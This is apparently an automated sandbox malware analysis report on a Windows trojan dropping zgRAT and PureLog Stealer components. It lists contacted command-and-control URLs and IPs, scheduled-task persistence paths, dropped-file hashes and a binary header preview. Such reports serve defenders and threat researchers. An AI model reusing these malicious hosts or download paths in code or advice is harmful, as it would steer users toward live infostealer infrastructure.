                                                                    https://discord.semkrill.ru/SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.galapagosdesign.com/DPleaseKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fonts.comKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.sandoll.co.krKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.urwpp.deDPleaseKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.zhongyicts.com.cnKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://185.246.67.73KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewebDriverintoDll.exe, 0000000B.00000002.1844340465.00000000031DA000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.sakkal.comKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://185.246HKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.apache.org/licenses/LICENSE-2.0KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.fontbureau.comKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://semkrill.ru/supportSandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                                        		high
                                                                                        https://semkrill.ru/contactSandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2898761896.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                                          		high
                                                                                          https://semkrill.ru/supportAI_SHORTCUTTABLE_FLAGSCOLUMNAQAAAA8AAABTAGEAbgBkAGUATABMAG8AQwBIAEUAQwBLASandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707913300.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.msi.3.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://www.ecosia.org/newtab/KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                                            		high
                                                                                            http://www.carterandcone.comlKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://sandello.rugorkmTnChA.exefalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://ac.ecosia.org/autocomplete?q=KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                                                		high
                                                                                                https://semkrill.ru/contactWindowsTypeNT40DisplayWindowsSandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707913300.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.msi.3.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.founder.com.cn/cnKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.fontbureau.com/designers/frere-user.htmlKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://discord.semkrill.ru/hSandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://discord.semkrill.ru/gSandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://semkrill.ru/supporthPhSandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.jiyu-kobo.co.jp/KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.fontbureau.com/designers8KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://semkrill.ru/supportEYSandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003427000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                                                            		high
                                                                                                            https://cdn.semkrill.ru/SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            172.67.184.109
                                                                                                            		cdn.semkrill.ruUnited States
                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                            185.246.67.73
                                                                                                            		unknownRussian Federation
                                                                                                            		29182THEFIRST-ASRUtrue

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1570976
                                                                                                            Start date and time:2024-12-08 15:26:05 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 9m 48s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:41
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:gorkmTnChA.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:E4E1923F51EB61ED20CBBFAB84AB25B5.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@46/102@1/2
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 83.3%
                                                                                                            HCA Information:Failed
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, ApplicationFrameHost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 2.22.50.131, 2.22.50.144
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                                                            • Execution Graph export aborted for target KAdpNCgonFhCnlBRasdZerWl.exe, PID 8132 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                            • VT rate limit hit for: gorkmTnChA.exe

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            09:27:21API Interceptor1321502x Sleep call for process: KAdpNCgonFhCnlBRasdZerWl.exe modified
                                                                                                            14:27:13Task SchedulerRun new task: ApplicationFrameHost path: "C:\Users\Default User\Favorites\ApplicationFrameHost.exe"
                                                                                                            14:27:13Task SchedulerRun new task: ApplicationFrameHostA path: "C:\Users\Default User\Favorites\ApplicationFrameHost.exe"
                                                                                                            14:27:13Task SchedulerRun new task: KAdpNCgonFhCnlBRasdZerWl path: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
                                                                                                            14:27:13Task SchedulerRun new task: KAdpNCgonFhCnlBRasdZerWlK path: "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            172.67.184.10900onP4lQDK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              https://insee-inscrire.fr/Verification.phpGet hashmaliciousUnknownBrowse
                                                                                                                https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=http://hFfpQ.accussibrand.com/croantree@csr.com.auGet hashmaliciousHTMLPhisherBrowse

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  cdn.semkrill.ru00onP4lQDK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  • 172.67.184.109

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  THEFIRST-ASRUhome.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                  • 37.230.119.182
                                                                                                                  x86-20241130-2047.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 82.146.62.180
                                                                                                                  sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 62.109.30.187
                                                                                                                  UNFOT5F1qt.exeGet hashmaliciousDCRatBrowse
                                                                                                                  • 188.120.228.203
                                                                                                                  RustChecker.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                  • 188.120.239.221
                                                                                                                  https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                  • 78.24.219.84
                                                                                                                  https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29tGet hashmaliciousUnknownBrowse
                                                                                                                  • 78.24.219.84
                                                                                                                  https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29tGet hashmaliciousUnknownBrowse
                                                                                                                  • 78.24.219.84
                                                                                                                  exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                                  • 37.46.129.215
                                                                                                                  https://sourcetrap.netGet hashmaliciousUnknownBrowse
                                                                                                                  • 82.202.163.23
                                                                                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                  • 172.67.165.166
                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 172.67.165.166
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  QZKG2scmaT.exeGet hashmaliciousPonyBrowse
                                                                                                                  • 172.67.180.93
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  • 104.21.16.9
                                                                                                                  Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.20.3.235

                                                                                                                  JA3 Fingerprints

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  37f463bf4616ecd445d4a1937da06e19esetonlinescanner.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  esetonlinescanner.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  vzHOEzLbDj.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  WaveExecutor.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  Nexus-Executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  WaveExecutor.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  Nexus-Executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  Xeno Executor.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                  • 172.67.184.109
                                                                                                                  file.exeGet hashmaliciousAmadey, CredGrabber, LummaC Stealer, Meduza Stealer, Stealc, VidarBrowse
                                                                                                                  • 172.67.184.109

                                                                                                                  Dropped Files

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dll00onP4lQDK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    Px0b16q72c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Program Files (x86)\Reference Assemblies\Microsoft\98135c31e34d63

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:ASCII text, with very long lines (838), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):838
                                                                                                                      Entropy (8bit):5.905488006641125
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:C/4zTnyT0LpEahKGjRMa79weJ9UHAsvtCu++InOleC6bJoZJg8:L3nzyG2E9weJ97Q++avCIJoZJg8
                                                                                                                      MD5:0D5FFC1EE5F145E9D40B162210A07370
                                                                                                                      SHA1:A23C8D6AAC17F93011C96C212EE095100AF9A693
                                                                                                                      SHA-256:0FF960050DCE24275451E6074FFCEE956A7D25B45D373AE8B4D70625B772543A
                                                                                                                      SHA-512:9E11B89023B858DA38479DE1CA3991132977649E0495A8645D737C7F595968492C32F7BC2D9248A0FDE4EF87AA4A86489CD1A44775627054F1F7EA2D2F7F062C
                                                                                                                      Malicious:false
                                                                                                                      Preview:whFKKh5HsIF6KwdfBAg2qpEirEmCgEMhDtpua5Ta9QWIjDPUzbZOBxIHdgdF52kn6i3bGsEFrF2aT59ozRNFo7fPkiR4cNfHqsMAJxNGWUh64syhhzQnpe98Co0ibKmdjvukt8eBEGtUaiU2utWn71cLtO8f7ppMsEWJ7NyjUOjivpidT7ysy8frSj1eA8EYbhlVML4g4xSsS4aDpeM917Ytio0YVTjVKKGODMRICRxApxZYIxzfwEheJ2whUgLkN7hIxMAcND6kJXDvPbPieDjGmmELZuxgGNxsPRl6xWSsH7UvyBR2QmFKXbfKHzDcQad6kUf80TuIv08pSTWYc4QdHnUxvaz8TzcrdXLdfTC627Yhc01ycoAWJAz7AsMZewz5YRL4H22I1TlJOxU5iAfoyFidiOdxGmcFIdJLo7rkw1ezZpsMXR0dRKGStsV2YFCP0fBunJRlT427lsD3fQazv9y7W0c6lyLrzP83n8jOAPJWSJrAocWIoNd1rEYwqU9etLHVtJQhrMyg0boMJbRJcDCmvHMijwhpPonHBVReLyacY7BPaLnOD0CpIfjm7r75oJQLygKyKw7onjNyF6IYISlZm78gvphe0exOqzb3AzEQ3YCjRvgAjjwWh1j0ioCePdxIw9IPfPYTOUgO4ZOAJh4RsbqzQkVVwjBak4xSnQeULcINVV6IZBVrigaUSS954ChoSGnAm5X2CkGPTdd5oM5uOU1DdcAUQjaI5d4Pr5gdocp7aKBzyEQrGwa8OkhK5CldK7TzjONsqcGvp4nSbLfMSsCJD5BHYWil0Lxd1LPk0iBoqpTU6OsuhZKb4KwnNG

                                                                                                                      C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3538432
                                                                                                                      Entropy (8bit):7.811102685383502
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
                                                                                                                      MD5:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      SHA1:AD784AF316C9674AB5963D9F3144EAB1A41DA087
                                                                                                                      SHA-256:B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
                                                                                                                      SHA-512:EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................5.........n.6.. ... 6...@.. .......................`6...........@................................. .6.K.... 6.p....................@6...................................................... ............... ..H............text...t.5.. ....5................. ..`.rsrc...p.... 6.......5.............@....reloc.......@6.......5.............@..B................P.6.....H...........D.......s...L...<,+...6......................................0..........(.... ........8........E....N...*...).......8I...(.... ....~....{....9....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..-....... ........8........E............R.......F...e...8........~....(f...~....(j... ....?*... ....~....{....9....& ....8....r...ps....z*8.... ........8z......... ....~....{....9d...& ....8Y...~....(^... .... .... ....s....~....(b..

                                                                                                                      C:\Program Files\Uninstall Information\98135c31e34d63

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):54
                                                                                                                      Entropy (8bit):5.074241437308591
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:xHQBcJqA9EWJn9n:Fl59B/
                                                                                                                      MD5:7B31840A1C8FE7DD2441893CFB52DA5C
                                                                                                                      SHA1:266115F8ADBC3C8F4DFA5BA3FA1DEAA4EC36E1F2
                                                                                                                      SHA-256:1453B57944DBE52D1C295BB6F4FB8E55471686307E345A170629ED2F6A614432
                                                                                                                      SHA-512:AF376B8076CB12D74154CA63A7DC6D2480A76B9D3D44FFB3A779A8CB3676A0A3F6A6B2DB55879AA52AEA5B40F6FF48EFC92DD87FCF1824040FF4121E1DB97355
                                                                                                                      Malicious:false
                                                                                                                      Preview:9DAR04kEGuPhhkqRpuOjrmyLiylLvF7CrwxjwXaSNAiwfYZ6fUiwPa

                                                                                                                      C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3538432
                                                                                                                      Entropy (8bit):7.811102685383502
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
                                                                                                                      MD5:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      SHA1:AD784AF316C9674AB5963D9F3144EAB1A41DA087
                                                                                                                      SHA-256:B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
                                                                                                                      SHA-512:EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
